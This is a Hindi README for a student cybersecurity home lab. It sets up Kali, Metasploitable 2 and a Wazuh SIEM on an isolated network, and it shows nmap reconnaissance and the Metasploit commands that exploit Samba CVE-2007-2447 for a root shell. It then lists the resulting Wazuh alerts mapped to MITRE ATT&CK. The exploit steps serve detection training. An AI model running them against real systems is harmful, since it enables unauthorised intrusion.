
एक पृथक AD/Linux आक्रमण प्रयोगशाला: Metasploit के माध्यम से CVE-2007-2447 का शोषण किया गया, Wazuh SIEM के साथ पता लगाया गया और MITRE ATT&CK (T1190, T1059) से मैप किया गया।
B.Tech परियोजना (BTP) | IIIT पुणे आधारित: "डिटेक्शन और मॉनिटरिंग के लिए एक प्रभावी साइबर सुरक्षा होम लैब का डिज़ाइन और कार्यान्वयन" — ICCCNT 2023, IIT दिल्ली
एक पूर्ण रूप से कार्यात्मक साइबर सुरक्षा होम लैब जो एक ही मशीन पर मुफ्त और ओपन-सोर्स टूल्स का उपयोग करके बनाई गई है। लैब वास्तविक दुनिया के हमले के जीवनचक्र — Reconnaissance → Exploitation → Detection — का अनुकरण करती है और प्रदर्शित करती है कि कैसे एक SIEM वास्तविक समय में हमलों का पता लगा सकता है और उन्हें MITRE ATT&CK ढांचे में मैप कर सकता है।
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
VirtualBox में cyberlab नामक एक इंटरनल नेटवर्क बनाएं। तीनों VMs को यह एडाप्टर मिलता है। Ubuntu/Wazuh VM को एक अतिरिक्त Host-Only एडाप्टर मिलता है ताकि आप ब्राउज़र से डैशबोर्ड तक पहुंच सकें।
cyberlab इंटरनल नेटवर्क एडाप्टर असाइन करें# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab नेटवर्क असाइन करें# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Metasploitable 2 को कभी भी इंटरनेट पर एक्सपोज़ न करें। यह जानबूझकर असुरक्षित है।
cyberlab इंटरनल + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (होस्ट ब्राउज़र से)चूंकि Metasploitable 2 Wazuh एजेंट नहीं चला सकता, इसलिए एजेंटलेस (agentless) मॉनिटरिंग के लिए syslog फ़ॉरवर्डिंग कॉन्फ़िगर करें:
Metasploitable पर, /etc/rsyslog.conf में जोड़ें:
*.* @10.0.0.3:514
Wazuh (Ubuntu) पर, /var/ossec/etc/ossec.conf में syslog इनपुट सक्षम करें:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Wazuh पुनः प्रारंभ करें: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Metasploitable 2 पर खोजी गई मुख्य सेवाएँ:
20+ ओपन पोर्ट खोजे गए। OS फ़िंगरप्रिंट किया गया: Linux 2.6.x
कमजोरी: CVE-2007-2447 — Samba usermap_script कमांड इंजेक्शन
Samba 3.0.0–3.0.25rc3 पर दोषपूर्ण MS-RPC अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है।
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
शोषण के बाद, Wazuh ने स्वचालित रूप से घटनाओं का पता लगाया और उन्हें MITRE ATT&CK में मैप किया:
कुल घटनाएँ पता चलीं: 55+
डैशबोर्ड तक पहुंचें: https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
यह लैब पूरी तरह से पृथक वर्चुअल मशीनों पर बनाई गई है, जिनमें हमले के अनुकरण के दौरान कोई इंटरनेट पहुंच नहीं होती। सभी टूल्स और तकनीकों का उपयोग कड़ाई से नियंत्रित वातावरण में शैक्षिक उद्देश्यों के लिए किया जाता है। उन प्रणालियों पर किसी भी हमले की तकनीक को दोहराने का प्रयास न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
प्रस्तुतकर्ता: हर्षिता वर्मा | IIIT पुणे
| VM | भूमिका | IP | टूल्स |
|---|
| Kali Linux 2026.1 | हमलावर | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | पीड़ित | 10.0.0.2 | 20+ कमजोरियाँ |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| टूल | संस्करण | उद्देश्य |
|---|
| VirtualBox | 7.x | हाइपरवाइज़र — सभी VMs को एक होस्ट पर चलाता है |
| Kali Linux | 2026.1 | पेनिट्रेशन टेस्टिंग OS (आक्रामक) |
| Metasploitable 2 | v2.0 | जानबूझकर कमजोर लक्ष्य |
| Wazuh | v4.7.5 | ओपन-सोर्स SIEM (रक्षात्मक) |
| Nmap | लेटेस्ट | नेटवर्क/पोर्ट स्कैनिंग |
| Metasploit Framework | लेटेस्ट | शोषण ढांचा |
| पोर्ट | सेवा | संस्करण |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| नियम ID | विवरण | MITRE तकनीक | रणनीति |
|---|
| 5402 | sudo के माध्यम से ROOT का सफल निष्पादन | T1548.003 | Privilege Escalation |
| 5501 | PAM: लॉगिन सत्र खोला गया | T1078 | Initial Access / Persistence |
| 5502 | PAM: लॉगिन सत्र बंद किया गया | T1078 | Defense Evasion |
| 502 | Wazuh सर्वर प्रारंभ हुआ | — | Detection Active |